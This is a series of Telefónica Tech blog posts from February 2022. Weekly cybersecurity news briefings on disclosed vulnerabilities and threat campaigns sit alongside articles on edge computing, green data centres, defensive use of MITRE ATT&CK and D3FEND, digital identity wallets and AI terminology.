Cyber Security Weekly Briefing 19-25 February

Telefónica Tech    25 February, 2022

New privilege escalation flaw in Linux

Security researchers at Qualys have discovered seven flaws in Canonical’s Snap software packaging and deployment system used in operating systems that use the Linux kernel. The most severe of these vulnerabilities, listed as CVE-2021-44731 and reportedly receiving a CVSSv3 of 7.8, is a privilege escalation flaw in the snap-confine function, used internally by the snapd tool to build the execution environment for snap applications. Successful exploitation could allow any unprivileged user to gain root privileges on the vulnerable host. The flaw was communicated to vendors and open-source distributions as soon as it was discovered last October, leading to a coordinated patch release process on 17 February. Qualys technicians have also developed an exploit for this issue that allows full root privileges to be obtained on default Ubuntu installations. The other six vulnerabilities identified are: CVE-2021-3995CVE-2021-3996CVE-2021-3997CVE-2021-3998CVE-2021-3999CVE-2021-44730.

All the details:https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731

Conti ransomware operators take over TrickBot operations

Researchers at Advanced Intelligence have published a report indicating that the TrickBot malware has transferred its management to the Conti ransomware operators. AdvIntel’s experts have analysed the background of TrickBot, noting a historically close relationship with the ransomware and its subsequent rise to prominence. Conti has relied, among other factors, on maintaining a code of conduct among its operators, which has allowed it to thrive and remain active in the face of other ransomware groups that have been dismantled by various law enforcement operations. Experts suggest that TrickBot gradually became a subsidiary of Conti’s operators, as they were the only ones to use it in their operations. Also, by the end of 2021, Conti finally absorbed multiple TrickBot developers and operators. However, it is worth noting that since TrickBot’s networks are reportedly being easily detected, Conti operators have begun to replace it with the BazarBackDoor malware, which is under its development and is used to gain initial access to its victims’ networks.

More: https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works

Cobalt Strike distributed on vulnerable MS-SQL servers

Analysts at ASEC have discovered a new campaign where vulnerable Microsoft SQL (MS-SQL) servers that are exposed to the internet are being attacked by malicious actors with the goal of distributing Cobalt Strike on compromised hosts. The attacks targeting MS-SQL servers include attacks on the environment where the vulnerability has not been patched, brute-force attacks and dictionary attacks against mismanaged servers. First, the malicious actor scans port 1433 to check if MS-SQL servers are open to the public, and then carries out brute-force or dictionary attacks against the administrator account to try to log in. Different malware such as Lemon Duck allow scanning of this port and propagate in order to move laterally in the internal network. The attacks culminate in the decryption of the Cobalt Strike executable, followed by its injection into the legitimate Microsoft Build Engine (MSBuild) process, which has been exploited in the past by malicious actors to deploy remote access trojans and credential-stealing malware. Finally, it is worth noting that the version of Cobalt Strike running on MSBuild.exe comes with additional settings to evade detection by security software.

All the details: https://asec.ahnlab.com/en/31811/

Life at the border

Emilio Moreno    23 February, 2022

Today’s article is not going to be about cowboy movies, nor about the Limes of the Roman Empire, nor about Radio Futura’s song even though it may seem like it. But I am going to take advantage of the Far West pun to introduce some more Edge Computing concepts.

When we talk about the concept of Edge Computing, as we have already mentioned on other occasions, we are referring to the concept of taking computing to the edge, from distant Data Centres to a point close to where the information that needs to be processed is generated. Telefónica, which has the DNA of a Telco, believes that the edge is the edge of our network, and we believe that our customers can benefit enormously from us bringing computing capabilities closer to that point.

Comparing the edge to the border, and in a similar way to what has happened throughout history, borders have not always been clearly defined. In Roman times, the Rhine and Danube rivers or Hadrian’s Wall clearly delimited part of the northern border. Others, such as the Far West, gradually changed over time.

In the case of our Edge, the terms Far Edge and Near Edge are becoming popular. And what they indicate is where that edge is, referring to how close or far it is from the Data Centres where computing has traditionally been based.

Near Edge usually refers to locations closer to Data Centres, typically located in Carrier Centrals, which are served by fibre connectivity. That is, with a relatively limited number of locations.

With Far Edge, the distance from the Data Centre is much greater, the density of locations increases and we can be talking about cabinets on the street, on mobile phone towers and even in customer premises.

If latency is key in the world of Edge Computing, as we have commented on other occasions, and the objective is to achieve the lowest possible values, we could think that the logical thing to do is to bet exclusively on a Far Edge strategy, in which we will almost certainly obtain lower latencies.

But life at the edge is not easy. And the further out we go, the greater the challenges. In typical Far Edge locations, the environmental conditions are more difficult, in terms of power supply, temperature, air conditioning, possibility of vandalism, etc. This means more complexity in the management of the infrastructure, and a challenge to offer service levels equivalent to those of traditional infrastructures. With this type of needs in mind, computer hardware manufacturers are launching new product lines specifically designed for this type of environment. When it comes to on-premises deployments, the challenge is often to find locations with a minimum of conditions to install them.

In the case of the Near Edge, these problems are not so significant because we are starting from facilities that already have the minimums: energy, air conditioning and connectivity. We will not have all the advantages of a traditional Data Centre, but we will be close. Life is a little simpler.

So, what type of Edge will predominate in the future? The answer will depend on the requirements of the use cases that are currently being tested and turned into commercial services and applications. If latency requirements are extremely low, the Far Edge will probably be more prevalent. If not, the Near Edge will be able to meet the needs of most use cases, with better cost and flexibility.

Odds are open now…

Leave a Comment on Life at the border
Emilio Moreno
Emilio Moreno

Telecommunications Engineer from the Polytechnic University of Madrid. I have been living and working in the cloud for a decade, and I currently work in product management at Telefonica Cybersecurity & Cloud Tech. Here I combine technology with business (with the usual Excel sheets) in VDC and VDC-Edge services, our commercial Edge Computing service. When I'm not in the cloud I like to travel, go for walks with my wife and read about historical topics.

Green data centers: fighting climate pollution from Internet use

Paloma, Recuero de los Santos    22 February, 2022

Do you have any idea how the Internet affects the environment? According to World Bank data, 48.5% of the world’s population was already connected to the Internet in 2017 (of course very unevenly, from 1% in countries like Eritrea, to 98% in the most developed countries). And the number is growing steadily. So much so, that since January 2018, the number of people who have connected to the Internet for the first time has increased by 9%, reaching 4.39 billion users in 2019, Let’s see how this impact is generated and what we can do to reduce it as much as possible.

Figure 1: Evolution of the percentage of the world's population connected to the Internet (World Bank)
Figure 1: Evolution of the percentage of the world’s population connected to the Internet (World Bank)

Data

One of the most easily identifiable consequences of this exponential growth is the parallel generation of large volumes of data. In fact, the level of data generated each week worldwide exceeds that accumulated in the last 1000 years of human history.

The growing demand for data exchange and the volume of information stored in the cloud has raised the need to build ever-larger storage and processing spaces. These facilities, which operate 24 hours a day, 7 days a week, and under very specific temperature and humidity conditions, can consume more energy than large countries. And their number is growing every day.

In fact, the company Cisco Systems, estimates that the number of hyperscale data centers in the world will increase from 259 in 2015 to 485 by 2020

Devices

In addition to the implications derived from the unstoppable growth of data, there are others that could pass unnoticed.

Talking about devices, on one hand, we must take into account the impact of their manufacture, both in terms of the use of very specific raw materials and energy resources, as well as the way in which we dispose of them when they are no longer useful (technological waste). Moreover, other “contributions” related to transportation, logistics, etc. should be added.

Can the impact of internet use on our environment be somehow measured? The answer is “yes”, and to do so, what we do is to quantify its carbon footprint.

What is the carbon footprint of the Internet?

The carbon footprint is a way of quantifying the greenhouse gas emissions released into the atmosphere as a result of a given activity. It is used as a tool to raise awareness of the impact of each activity on global warming.

And yes, it is possible to calculate the carbon footprint generated by each email sent (a high percentage of which is unwanted), each tweet, each Google search, each photo uploaded to a social network…

This revealed that data centers are one of the most polluting industries in the world. So much so that, if we do nothing to prevent it, the impact of ICT industries on the generation of greenhouse gases could reach values equivalent to 50% of the impact generated by the use of fossil fuels in the transport sector by 2040.

Information and communication technology (ICT) equipment and services consume more than 8% of the EU’s electrical energy and produce around 4% of its CO2 emissions. These figures could double by 2020.

European Commission Digital Agency (September 2010)

That is why, despite being a great challenge, the EU has set out a voluntary Code of Conduct to improve the efficiency of data centers and reduce energy consumption since 2008, which many companies have already joined.

How can we reduce the effect of ICT on global warming?

As individuals, we can take actions such as unsubscribing from newsletters that do not interest us, avoiding what is known as “latent pollution”, due to the unnecessary storage of e-mails. We can also reduce our queries to Google, and avoid spending hours watching videos of kittens on Youtube or connected to social networks.

In short, making responsible use of the Internet, being aware that each of these actions is a drop in the ocean, yes, but it is a sum and follows the overall balance, and we are many millions of people who “play our part”.

However, the lion’s share lies in achieving more efficient and environmentally friendly data centers: the “green datacenters” or “green” data centers.

Green datacenters.

In 2017, Greenpeace USA produced a report “Clicking Clean: Who’s Winning the Race to Create a Green Internet 2017?” that analyzed the energy footprints of the largest data centers and nearly 70 of the world’s most popular sites and apps and explained the situation in a didactic video:

He urged the major Internet companies to stop using outdated and polluting “dirty” energies, and to start covering their energy needs 100% with renewable energies such as hydro and wind sources.

As a result of this interest, green data centers emerged, which are those that adopt sustainable technological solutions that contribute to improving energy efficiency and, therefore, to economic and environmental sustainability.

The environmental conditions in some countries such as Ireland, Norway, Iceland, Sweden, etc. have turned them into true “superpowers” of green data centers.

For example, in Norway, energy-efficient and sustainable data centers are built next to fjords. They use cooling systems that carry water, at 8ºC, from the fjord to the station without using electrical energy, only with the help of gravity, and without the need to use refrigerant gases, which ensures that it is a sustainable plant with zero emissions.

In other cases, data centers are built underground, such as the Lefdal Mine Datacenter, which, located in a former mine at a depth of more than 600 meters, obtains its energy supply from a nearby hydroelectric power station; or even underwater, such as Microsoft’s Nactik project in the Shetland Islands.

Conclusion

The information and communication technologies (ICT) sector must be a pioneer in the adoption of sustainable technological solutions that contribute to improving energy efficiency and, therefore, to economic and environmental sustainability.

One of the main advances towards this sustainability is the evolution of traditional data centers towards “hyperscale” data centers. These centers achieve significant savings in energy consumption by using large arrays of commodity servers designed for specific tasks instead of conventional servers, and by adopting the latest advances in cooling.

On the other hand, companies such as Google have achieved significant reductions in the energy consumption of their data centers by optimizing the use of their cooling systems using artificial intelligence algorithms.

Finally, we cannot forget that many start-ups and large companies such as Intel and AMD are developing semiconductors to manufacture new microchips based on technologies such as photonics to power neural networks and other artificial intelligence tools that consume much less energy.

In short, while technological progress poses significant challenges to environmental conservation, at the same time, every day, it offers new solutions.

Read the original post in Spanish here.

A digital twin to save the Mar Menor

Cyber Security Weekly Briefing 12-18 February

Telefónica Tech    18 February, 2022

Researchers develop exploit for critical vulnerability in Magento

Positive Technologies’ offensive security team has developed a Proof of Concept (PoC) for the CVE-2022-24086 CVSSv3 9.8 vulnerability, claiming that it would allow control of the system to be gained with web server permissions. However, the researchers have stated that they do not intend to release this exploit either publicly or privately to other industry analysts. This critical vulnerability affecting Adobe Commerce and Magento Open Source was fixed by Adobe last Sunday in a security update. Exploiting this flaw would allow an unauthenticated attacker to execute arbitrary code remotely, although it is worth noting that, despite not requiring authentication, it can only be exploited by an attacker with administrator privileges. The flaw affects Magento Open Source and Adobe Commerce versions 2.4.3-p1 and 2.3.7-p2 and earlier, with the exception of Adobe Commerce versions prior to 2.3.3.3. Also yesterday, Adobe updated this security bulletin to add a new flaw, CVE-2022-24087, also of the Improper Input Validation type, which also has a CVSSv3 score of 9.8 and would allow an unauthenticated attacker to execute arbitrary code remotely. It is recommended to patch both critical vulnerabilities as soon as possible.

More info: https://helpx.adobe.com/security/products/magento/apsb22-12.html

​​0-day in Chrome being actively exploited

Google released fixes for eight security flaws in the Google Chrome browser on Monday, including a high-criticality vulnerability that is being actively exploited. This use-after-free vulnerability resides in the animation component, has been identified as CVE-2022-0609 and, if successfully exploited, would allow an attacker to execute arbitrary code remotely, as well as alter legitimate information. Google has also addressed four other high-criticality vulnerabilities of the use-after-free type that affect the file manager, ANGLE, GPU and Webstore API, as well as a heap buffer overflow vulnerability in Tab Groups and an inappropriate implementation in the Gamepad API. Google recommends updating Google Chrome to version 98.0.4758.102 to fix these bugs.

Discover more: https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html

​TA2541 campaign persistent over time

Researchers at Proofpoint have published a new paper attributing a long-running, persistent attack campaign to the TA2541 group. The campaign targets aviation, aerospace, transportation, manufacturing and defence sectors in North America, Europe and the Middle East. The activity of this group dates back to 2017 and, since that year, they have used TTPs that have been maintained over time. The usual entry vector identified is an English-language phishing campaign using aviation, transport or travel-related subjects. They do not take advantage of current subjects as other groups often do, although they have also occasionally mixed their usual subjects with current ones like COVID-19. These emails include attachments that already download the payloads of different RATS, mainly families that can be easily acquired in cybercrime forums, with AsyncRAT, NetWire and WSH RAT standing out above the rest. The group has recently improved its campaigns and is no longer sending payloads in attachments, but in links included in emails that connect to cloud services.

All details: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

​Classified US information exfiltrated by Russian actors

CISA has published a security advisory warning of a cyber espionage campaign dating back to at least January 2020. According to the warning, Russian threat actors have compromised and exfiltrated information from US-authorised defence contractors (CDC), private entities that are authorised to access highly sensitive information in order to bid for contracts, access information in the areas of intelligence, armaments, aircraft, information technology, among others. Among the techniques used as an entry vector, the attackers would have used spearphishing campaigns, credential harvesting, brute force techniques, password spraying or the exploitation of vulnerabilities. Once the companies had been compromised, the attackers managed to establish persistence in some of them for at least six months, thus enabling Russia to obtain strategic information with which it could have established military priorities, strategic plans and accelerated software development.

More info: https://www.cisa.gov/uscert/ncas/alerts/aa22-047a

A practical approach to integrating MITRE’s ATT&CK and D3FEND

Diego Samuel Espitia    16 February, 2022

Businesses have become aware of the need to have mechanisms in place to ensure the protection of their information and how important it is to understand their weaknesses in order to improve their resilience in the event of a cyber incident. Although many managers continue to see security as the need to have elements designed to protect and minimise the possibility of an attack, this is no longer the case. Cybersecurity is an ongoing process that requires understanding the adversaries and the risks in the environment.

MITRE’s ATT&CK, which we have talked about on previous occasions in our blog, was born with this philosophy in 2013, seeking to compile in a matrix the techniques, tactics and procedures used by attackers in real actions against business, mobile and industrial environments, where its evolution has led to the creation of a matrix of defensive capabilities and countermeasures, called D3fend.

Mitre states that, “cyber threat intelligence is about knowing what adversaries are doing and then using that information to improve decision making”, so regardless of the size of the cybersecurity team, this tool is vital in the process of ensuring information security. In this way, it is possible to associate techniques of the main criminal groups, iconic cases of incidents in different industries, validate which are the common adversaries, know the software used in each of the phases of the attack, among many other tools that are provided.

Companies that are just starting out and have few resources in the area can begin by understanding the usual behaviour of the adversaries in their industry, and with this data validate whether the defences implemented detect and mitigate the actions of these groups. To understand how this analysis is done, let’s take the example of a logistics company, which has recently been the victim of several ransomware attacks around the world

1. Find your sector. Determine the sector of the industry that the business is focused on. For this purpose, the website provides a search engine at the top. Here we will enter logistics for the example

Figure 1: Search result in https://attack.mitre.org/groups/

For the analysis we will take the Cuba ransomware, which we mark in the illustration. It is one of the most widely used against medium-sized companies in Latin America.

2. Adversary information. Once the software or group to be analysed is selected, access is gained to the information provided by the system, such as basic data on the platform being attacked, when it was detected, who detected it and the victim industries.

Figure 2: Adversary information

3. Know the techniques. This same adversary page shows the techniques that have been detected in attacks where this malware has been used in a list that enumerates the techniques and sub-techniques used.

Figure 3: Techniques used by Cuba in an attack.

Right there in the “Navigator Layers” it gives the possibility to see within the matrix what the tactics and their techniques are.

Figure 4: Visualisation of tactics and techniques used by Cuba.

In this case, it can be seen that the techniques used by the adversary groups to initiate the attack are unknown or not reflected, which is called pre-attack in the matrix. This usually indicates that the techniques used are too varied to establish a specific one.

4. Know the defences. Each of the techniques has a section listing the possible forms of detection that should be implemented to mitigate this action. For the example we will look at a sub-technique used in the execution tactic, and which is usually the first step detected by incident response investigators in ransomware attacks.

Figure 5: Technique to be analysed, because it shows us a command.

Adversaries use the Windows command console to execute programmes inside the victim machine. In the specific case of Cuba, the cmd.exe /c command has been detected in several of the activities analysed.

By accessing the information on the technique, we have the basic data collected on how it has been used, some of the procedures where it has been detected, possible mitigations and ways of detecting its execution. For our example case we will look directly at the information and the possible ways to detect it.

Figure 6: T1059.003 Technique data
Figure 7: Detection recommendations for T1059.003

With this information, the cybersecurity team can make decisions on how to act to prevent an incident that uses this software to affect their industry sector.

They can even reference the technique to search the defence matrix for more information on how to protect themselves. Go to https://d3fend.mitre.org/ and in the search engine called ATT&CK lookup enter the technique, for our example T1059.003.

Figure 8: Relation with defence matrix.

This shows the map of the forms of defence and detection, and for our example these are as follows.

Figure 9: Defence map for T1059.003

In short, this tool is invaluable for all types of businesses and cybersecurity teams, providing information and data to make decisions in the pursuit of better cyber resilience.

Cyber Security Weekly Briefing 5 – 11 February

Telefónica Tech    11 February, 2022

Microsoft disables macros and MSIX to prevent malware distribution

Microsoft has been actively mobilising against multiple malware attacks that use some of its technologies as an entry vector. The products affected in particular are the Office suite and the MSIX application installers that allow developers to distribute applications for different platforms. In the case of Office, the company will disable Visual Basic for Applications (VBA) macros by default in all its products, including Word, Excel, PowerPoint, Access and Visio, for documents downloaded from the web, although they can be enabled voluntarily by the user. According to Microsoft’s own publication, enabling macros in an Office file allows threat actors to deliver malicious payloads, deploy malware, compromise accounts, exfiltrate information and even gain remote access to targeted systems. The move comes just a month after the Windows vendor disabled Excel 4.0 (XLM) macros by default, another feature that is widely abused to distribute malware. Regarding MSIX application installers, Microsoft has announced that it will temporarily disable the MSIX ms-appinstaller protocol driver in Windows after evidence of active exploitation of vulnerability CVE-2021-43890, which allows the installation of unauthorised applications and is being used to deliver malware such as Emotet, TrickBot and Bazaloader. This move means that, until Microsoft fully fixes the bug, App Installer will not be able to install an app directly from a web server, so users must first download the app to their device and then install the package with the app installer.

More: https://docs.microsoft.com/es-es/DeployOffice/security/internet-macros-blocked

Possible exfiltration of information due to vulnerability in Argo CD

Researchers at Apiiro have disclosed a vulnerability in Argo CD, a widely used tool for deploying applications in Kubernetes, which could be exploited by attackers in order to obtain sensitive information from different organisations, especially passwords and API Keys. The vulnerability has been catalogued with the identifier CVE-2022-24348 – 7.7 CVSSv3 and consists of a Path-Traversal flaw that could lead to privilege escalation, information disclosure and lateral movement attacks. Exploitation is achieved by loading a YAML file specially crafted for Kubernetes Helm Chart on the target system, as long as you have permission to create and update applications and you know the full path to a file containing a valid YAML. For its part, Argo CD released version 2.3.0-rc4 last Friday, just 5 days after Apiiro researchers alerted them to the bug.

All the details: https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/

Critical vulnerabilities in SAP products

SAP has released its February security bulletin issuing 22 major updates, including fixes for the Log4j impact, as well as three critical memory corruption vulnerabilities affecting Internet Communication Manager (ICM), a core component of SAP’s business applications. These last three flaws were discovered by SAP’s product security response team, in collaboration with Onapsis Research Labs, who have named them ICMAD” (Internet Communication Manager Advanced Desync). The most critical vulnerability is already patched in SAP Security Note 3123396, identified as CVE-2022-22536 and with a CVSSv3 of 10.0, it would allow an unauthenticated attacker to prepend a victim’s request with arbitrary data and thereby execute functions impersonating the victim. The remaining two bugs have also been patched by SAP in its security advisory 3123427 and correspond to CVE-2022-22532 and CVE-2022-22533 with CVSSv3 of 8.0 and 7.5 respectively. Both of these would also be exploitable by an unauthenticated remote attacker, although they only affect SAP applications running on SAP NetWeaver AS Java. It should be noted that successful exploitation of these vulnerabilities could result in severe impacts such as: theft of confidential information, ransomware and disruption of business processes and operations. SAP recommends applying SAP’s February 2022 security updates as soon as possible, as well as making use of the open source tool provided by Onapsis that identifies whether a system is vulnerable and in need of patching.

Discover all: https://onapsis.com/blog/sap-security-patch-day-february-2022-severe-http-smuggling-vulnerabilities-sap-netweaver

Microsoft security updates

Microsoft has fixed a vulnerability in Microsoft Defender antivirus on Windows that allowed attackers to distribute and execute payloads unnoticed by the malware detection engine. The flaw is due to a loosely configured registry key containing the list of locations excluded from Microsoft Defender scanning that was visible to all users. After remediation this is visible only to users with administrator privileges. This security bug affected the latest versions of Windows 10 and would have been fixed with Microsoft’s latest security updates in February. It is also worth noting that Microsoft is removing the Windows Management Instrumentation (WMIC) command line tool, wmic.exe, from the development portal in the latest versions of Windows 11, in favour of Powershell. The removal would only affect the command tool, so WMI is not affected. WMI has been widely exploited by malicious actors and is even considered a LOLBin (living-off-the-land binaries). By removing the WMIC utility, multiple attacks and malware will no longer function properly, as they will no longer be able to execute some commands necessary to carry out their operations, although it is possible that attackers will replace WMIC with new methods.

More info: https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-defender-flaw-letting-hackers-bypass-antivirus-scans/

Cybercriminals exploiting Windows Regsvr32 utility to distribute malware

Researchers at Uptycs have analysed a new campaign in which malicious actors are increasingly abusing a Windows LOLBin known as Regsvr32 to spread malware. LOLBins are legitimate, native utilities commonly used in computing environments that cybercriminals exploit to evade detection by blending in with normal traffic patterns. In this case, Regsvr32 is a Microsoft-signed utility in Windows that allows users to manage code libraries and register DLL files by adding information to the central directory (registry) so that it can be used by Windows and shared between programs. According to Uptycs, the utility is being abused through a technique known as Squiblydoo, where Regsvr32 is used to execute DLLs via COM scriptlets that do not make any changes to the registry. The research adds that malicious use of this utility has been on the rise lately, mainly in the registry of .OCX files hosted in various malicious Microsoft Office documents. Uptycs has analysed up to 500 malware samples that are reportedly being distributed, some of them belonging to Qbot and Lokibot.

All the details: https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents

Digital Identity Wallets against identity theft fraud

Alexandre Maravilla    8 February, 2022

Identity theft or impersonation is a type of fraud in which criminals manage to supplant the identity of the person being deceived, based on the theft of their personal information. There are particularly relevant cases such as the one described in this article in El País: “They impersonated me and spent 100,000 euros in my name. I’m still suffering the consequences” | Technology | EL PAÍS (elpais.com)

In this particular case, the victim lost his national identity card, or perhaps it was stolen on purpose, but either way, it ended up in the hands of fraudsters. Identity theft based on a stolen ID card is a technique that is unfortunately on the rise, largely due to the fact that since the advent of COVID-19, most transactions have become digital and are carried out remotely.

How to prevent phishing fraud

The most effective suggestion and solution is to reduce the amount of personal information shared as much as possible. For example, in the case of requests to send a scanned ID card, do so by partially blocking out information that is not strictly necessary, such as the expiry date, the postal address, or our photograph.

However, sometimes requests to send personal information go beyond the ID card and may ask for financial or tax data such as invoices, bank transactions or even tax returns. This type of request is common in banks to prevent money laundering, but it is also common for this personal data to be requested for procedures related to the evaluation of financial solvency, for example, by landlords in the case of rental housing.

Can we refuse to share this type of personal information? The current law requires the recipient of such personal data to process such information in accordance with the European Data Protection Directive (GDPR), but the recipient is entitled to request it.

In the case of fraudsters, they try to trick victims by posing as fake landlords, fake sellers, or even lenders. All of this is done to collect personal information that allows them to impersonate and gain access to credit, open bank accounts from which to launder money (through mule accounts) or make fraudulent purchases.

Digital Identity Wallets to the rescue

An ” ID Wallet ” is a cryptographic application that is installed on our mobile devices allowing us to store and share credentials related to our identity and its attributes https://business.blogthinkbig.com/europes-new-digital-identity-sovereign-identity-wallets/. These applications allow us to verify our identity without sharing our ID card, or for example to validate our financial solvency without sharing invoices, bank transactions or tax returns.

How do they work? By storing credentials linked to our identity that can be verified and validated by third parties. For example, we can store in the wallet our ID card along with our financial information issued by our bank. When a landlord asks us to prove that we live in Spain, that we are over 18 years of age and solvent, we can share our identity card (which is not the same as the DNI), together with the financial solvency card (which is not the tax return or bank details). In this way, we will be validating the conditions required by the landlord, without the need to share any personal data that could be manipulated or used without our consent.

The underlying technology in this whole process is blockchain and ensures that the information stored in the wallet is accurate, and that the issuing authority is trustworthy. In this way the recipient of the information can validate its legitimacy.

A not-so-distant future

The European Union is already working on this type of solution and aims for all EU citizens to have access to this technology by 2024. In Spain, several initiatives are beginning to emerge, such as the Alicante ID project, which aims to create a local digital identity ecosystem, so that citizens, administrations and companies can exchange verifiable credentials stored in identity wallets.

The aim of all these projects is to return control of personal data to those to whom it belongs, the users themselves. Privacy in the processing of personal information increases security and prevents online fraud.

Cyber Security Weekly Briefing 29 January – 4 February

Telefónica Tech    4 February, 2022

Exploits that allow privilege elevation in Windows published

Security researchers have made public several exploits that leverage a known elevation of privilege vulnerability that affects all versions of Windows 10. The exploits specifically rely on vulnerability CVE-2022-21882 – 7.0 CVSSv3 which, in combination with a bypass of CVE-2021-1732 – 7.8 CVSSv3 (both already patched by Microsoft), could allow a threat actor to easily elevate its privileges to spread laterally within the network, create new users or execute high privilege commands. According to Microsoft, the vulnerability was discovered by a private researcher who shared a technical analysis of the vulnerability shortly after the official Windows updates were released. In addition, several investigations have already confirmed the full functionality of the published exploits. It is worth noting that Microsoft’s last fixes, in January, resulted in multiple severe bugs in key system services that were subsequently fixed with extraordinary released patches (OOBs), which may have led system administrators to wait for the next fixes in February, so it is estimated that as of today, there may be many devices vulnerable to these new exploits.

More info: https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/

Critical vulnerability in Samba

Samba has released security updates to address three vulnerabilities that, if successfully exploited, could allow remote attackers to execute arbitrary code with the highest privileges on affected installations. Among the security flaws is the following one listed as CVE-2021-44142 with a CVSSv3 9.0, which was reported by Orange Tsai of DEVCORE and affects all versions of Samba prior to 4.13.17. It is specifically an out-of-bounds read/write vulnerability in the “vfs_fruit” VFS module that provides support for Apple’s SMB clients. It should be noted that to exploit this vulnerability it is required write access to a file’s extended attributes in a Samba network folder. According to the CERT Coordination Centre (CERT/CC), the list of platforms affected by this vulnerability includes Red Hat, SUSE Linux and Ubuntu. Administrators can fix the flaw by installing versions 4.13.17, 4.14.12 and 4.15.5 or by applying the security patches released by the vendor. Samba has also provided mitigation measures for administrators who cannot immediately install the latest versions by removing the “fruit” lines from “vfs objects” in the Samba configuration files. Finally, there are two other bugs of lower criticality (CVE-2021-44141 CVSSv3 4.2 and CVE-2022-0336 CVSSv3 3.1).

All the details:https://www.samba.org/samba/history/security.html

Campaign targeting senior executives via malicious OAuth applications

Researchers at Proofpoint have analysed a new campaign, active since January, which they have named OiVaVoii due to the use of malicious OAuth applications. This campaign uses compromised Office 365 tenants and a sophisticated combination of lures such as malicious OAuth applications and spear phishing. Malicious actors can take control of corporate accounts through these techniques, increasing the risk of these activities leading to data leaks, lateral moves, brand abuse, ongoing phishing campaigns or malware distribution. The targets of this campaign would be high-level executives, including CEOs, Managing Directors and Board members. Microsoft has blocked four of the fraudulent applications used, although new ones have been created, and Proofpoint notes that these activities are still ongoing. Potentially impacted companies should revoke permissions, remove the applications, delete any malicious mailbox rules added by the malicious actors and review any downloaded files.

All info: https://www.proofpoint.com/us/blog/cloud-security/oivavoii-active-malicious-hybrid-cloud-threats-campaign

​”UPnProxy”: thousands of routers vulnerable to UPnP attacks

Researchers at Akamai have detected a malicious campaign called “Eternal Silence” that abuses the Universal Plug and Play (UPnP) protocol in order to use thousands of routers as proxies, thus hiding the real location of the malicious actors. UPnP is present in almost all current routers allowing automatic port forwarding for access to different services and/or software, which makes it easy for a potential attacker to add UPnP port forwarding entries through a device’s exposed WAN connection. In particular, analysts point out that the attacks attempt to expose TCP ports 139 and 445 on devices connected to the targeted router to subsequently exploit already known vulnerabilities such as EternalBlue (CVE-2017-0144) and EternalRed (CVE-2017-7494) on unpatched Windows and Linux systems, respectively. This attack technique has been referred to by Akamai as “UPnProxy” and, according to its research, of the more than 3 million UPnP routers scanned online, 277,000 would be vulnerable to UPnProxy and more than 45,000 have already been infected. Additionally, Akamai highlights that these techniques are almost unnoticeable to victims, so it recommends auditing NAT table entries and, if a compromise is detected, rebooting or updating the device’s firmware.

Discover more: https://www.akamai.com/content/dam/site/en/documents/research-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf

0-day vulnerability in Zimbra

Researchers at Volexity have discovered a 0-day vulnerability in the Zimbra collaborative email platform that is being actively exploited online against government organisations and media outlets in Europe. According to the published report, the exploitation campaign started last December with the sending of phishing emails with malicious links under the lure of interview requests or invitations to charity auctions. When clicking on the malicious link, the attackers’ infrastructure redirects the victim to a page hosted on the target organisation’s Zimbra webmail host with a specific URI format that, if the user is logged in, exploits an XSS (cross-site scripting) vulnerability allowing the execution of arbitrary JavaScript code in the context of the logged-in Zimbra session, as well as leaking cookies to gain persistent mailbox access, forward phishing to other users or downloading malware from trusted websites. Volexity attributes this exploit campaign to a threat actor called “TEMP_Heretic”, unknown to date and whose origin could be Chinese. Additionally, the research confirms that the most recent versions of Zimbra (8.8.15 P29 and P30) are vulnerable, although tests conducted on version 9.0.0 indicate that it is likely to be unaffected, so it is recommended to upgrade if possible.

All the details: https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/

Artificial Intelligence or Cognitive Intelligence? The buzz words of business

Paloma Recuero de los Santos    1 February, 2022

(Original post in Spanish: ¿Inteligencia artificial o cognitiva?)

Artificial Intelligence in the last 5 years has become the biggest buzz word with various spin offs including “Cognitive Intelligence”, “Smart Technologies” and “Predictive Technologies”. The often-negative associations that accompany the idea of Artificial Intelligence means some companies are shying away from declaring themselves as AI pioneers and instead are creating their own buzz words. But what is the real difference between these ideas and how do AI companies deal with possible negative connotations? 

What is AI?

The Encyclopædia Britannica defines the concept of Artificial Intelligence as the “the ability of a digital computer or computer-controlled robots to perform tasks commonly associated with intelligent beings. The term is frequently applied to the project of developing systems endowed with the intellectual processes characteristic of humans, such as the ability to reason, discover meaning, generalize, or learn from past experience”. The problem with the term Artificial is that it gives the connotations of a lack of authenticity, robotic-like and unnatural when it’s aim is to be quite the opposite.

To summarize this rather lengthy explanation in fewer words, one could simply describe AI as creating a computer that can solve complex problems as a human would. It is a vital part of economic sectors such as Information technologies, Health, Life Sciences, Data Analysis, Digital Transformation, Security and now in the consumer sector with the development of smart homes etc.

Cognitive Intelligence and Machine Learning

Cognitive Intelligence is an important part of AI, that encompasses the technologies and tools that allow our apps, website and bots to see, hear, speak, understand and interpret a user’s needs in a natural way. That’s to say, they are the applications of AI that allow machines to learn their users’ language so that the users don’t have to learn the language of machines. AI is a much wider concept that includes technology and innovations such as robotics, Machine Learning, Deep Learning, neural networks, NLP etc.

Machine learning is one branch of Artificial Intelligence that allows researchers, data scientists, data engineers and analysts to build algorithms that learn and can make “data-driven” predictions. Instead of following a series of rules and instructions, these algorithms are trained to identify patterns in large quantities of data. Deep Learning takes this idea one step further and processes the information in layers, so that the result obtained in one layer becomes the input for the next.

So, if AI is so important why is the term often tip toed around?

The origin of negative connotations for AI

Firstly, it seems that it has become a “worn-out” word. It has been used so widely that the whole world seems to know about it (and have their opinion on) the subject! This widespread use has been accompanied by a lack of information. Many people can only base their understanding on what Hollywood has taught them; that AI is limited to robots and Strong AIs. Others think they are talking about AI when, in reality, they are talking about Machine Learning.

